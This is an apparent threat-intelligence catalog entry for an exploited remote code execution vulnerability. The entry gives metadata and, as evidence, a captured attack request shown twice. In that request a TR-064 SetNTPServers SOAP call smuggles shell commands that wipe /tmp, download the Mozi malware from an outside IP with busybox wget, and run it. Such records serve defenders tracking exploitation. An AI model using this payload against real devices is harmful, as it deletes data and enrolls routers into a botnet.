GCVE-1-2026-0020

Known Exploited Vulnerability Entry Local Catalog

Back to Catalog View Vulnerability

Entry Details

Vulnerability ID

GCVE-1-2026-0020

Status

Confirmed

Exploited

Yes

Status Updated At

2026-03-23 06:37 UTC

Characteristics

Remote Code Execution

Yes

Authentication Required

Local Access Required

Remote

Severity

100.0

Timestamps

First Seen At

2026-01-14

Asserted At

2026-03-11

Last Seen At

2026-03-11

Entry UUID

523ca818-9868-4f11-832b-baf2fbd9d76c

Catalog Origin UUID

1a89b78e-f703-45f3-bb86-59eb712668bd

Created

2026-03-11 14:14 UTC

Last Updated

2026-03-23 06:37 UTC

Evidence (1)

Type Source Signal Confidence Details GCVE Metadata

Type	Source	Signal	Confidence	Details	GCVE Metadata
sinkhole	cti-feed.circl.lu	in_the_wild_attempts	1.00	View details { "note": "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\r\n\u003cSOAP-ENV:Body\u003e\u003cu:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\u0026qu ot;\u003e\r\n\u003cNewNTPServer1\u003e`cd /tmp \u0026\u0026 rm -rf * \u0026\u0026 /bin/busybox wget http://180.243.4.71:51387/Mozi.m \u0026\u0026 chmod 777 /tmp/tr064 \u0026\u0026 /tmp/tr064 tr064`\r\n\u003c/NewNTPServer1\u003e\u003cNewNTPServer2\u003e`echo DEATH`\r\n\u003c/NewNTPServer2\u003e\u003cNewNTPServer3\u003e`echo DEATH`\r\n\u003c/NewNTPServer3\u003e\u003cNewNTPServer4\u003e`echo DEATH`\r\n\u003c/NewNTPServer4\u003e\u003cNewNTPServer5\u003e`echo DEATH`\r\n\u003c/NewNTPServer5\u003e\u003c/u:SetNTPServers\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e" }	-

sinkhole

cti-feed.circl.lu

in_the_wild_attempts

1.00

View details

{
  "note": "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\r\n\u003cSOAP-ENV:Body\u003e\u003cu:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\u0026qu ot;\u003e\r\n\u003cNewNTPServer1\u003e`cd /tmp \u0026\u0026 rm -rf * \u0026\u0026 /bin/busybox wget http://180.243.4.71:51387/Mozi.m \u0026\u0026 chmod 777 /tmp/tr064 \u0026\u0026 /tmp/tr064 tr064`\r\n\u003c/NewNTPServer1\u003e\u003cNewNTPServer2\u003e`echo DEATH`\r\n\u003c/NewNTPServer2\u003e\u003cNewNTPServer3\u003e`echo DEATH`\r\n\u003c/NewNTPServer3\u003e\u003cNewNTPServer4\u003e`echo DEATH`\r\n\u003c/NewNTPServer4\u003e\u003cNewNTPServer5\u003e`echo DEATH`\r\n\u003c/NewNTPServer5\u003e\u003c/u:SetNTPServers\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e"
}

Export Options

JSON Object JSON API View Full Catalog